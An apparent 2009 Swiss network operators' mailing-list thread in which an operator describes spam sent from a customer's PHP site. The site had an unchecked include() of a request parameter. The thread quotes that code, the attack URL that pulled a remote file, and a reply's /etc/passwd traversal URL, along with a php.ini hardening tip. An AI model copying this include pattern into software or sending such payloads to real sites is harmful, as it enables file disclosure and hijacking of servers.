luckily in this very single case! :)
On 19.02.2009, at 17:05, Mike Kellenberger wrote: > luckily in this case: it's a windows server... > > regards, > > mike > > -- > Mike Kellenberger [email protected] > Escapenet - the Web Company Tel +41 52 235 0700 > http://www.escapenet.ch Skype mikek70atwork > > > -----Ursprüngliche Nachricht----- > Von: [email protected] [mailto:[email protected] > ] Im Auftrag von Gianni Carafa > Gesendet: Donnerstag, 19. Februar 2009 17:04 > An: [email protected] > Betreff: Re: [swinog] F*ing Spammers and stupid customer code... > > Thats bad coding anyway : > > http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd > > > > Regards Gianni > > > > > > Radek Mrskos schrieb: >> I think, this is what you should have anyway in your php.ini >> >> >> allow_url_fopen = Off >> >> /Radek >> Am 19.02.2009 um 16:31 schrieb Mike Kellenberger: >> >> >>> Hi all >>> >>> Just stopped our mail server from spitting out thousands of spam >>> messages. >>> >>> We have a customer who has a site with the following (stupid) code >>> in >>> his index.php: >>> >>> if($called_page_link!="") >>> { >>> $requested_file=$called_page_link; >>> } >>> >>> include($requested_file); >>> >>> >>> The f*ing spammer found out about this and called the page with: >>> >>> http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit >>> ies.com/nimiuu/fuck.txt? >>> >>> >>> Boom. >>> >>> Have I already told you that I hate spammers? :-) >>> >>> Oh well, one down - a few million to go... >>> >>> >>> Regards, >>> >>> Mike >>> >>> -- >>> Mike Kellenberger >>> [email protected] >>> Escapenet - the Web Company Tel +41 52 235 >>> 0700 >>> http://www.escapenet.ch Skype >>> mikek70atwork >>> >>> >>> _______________________________________________ >>> swinog mailing list >>> [email protected] >>> http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog >>> >> >> Mit freundlichen Grüssen >> >> Radek Mrskos Email: [email protected] >> Baechlerstr. 12 Tel: +41 43 534 40 24 >> CH-8802 Kilchberg Mob: +41 79 219 68 66 >> PGP:0x8CB69F6D Fax: +41 86079 2196 866 >> >> _______________________________________________ >> swinog mailing list >> [email protected] >> http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog >> > _______________________________________________ > swinog mailing list > [email protected] > http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog > _______________________________________________ > swinog mailing list > [email protected] > http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog _______________________________________________ swinog mailing list [email protected] http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
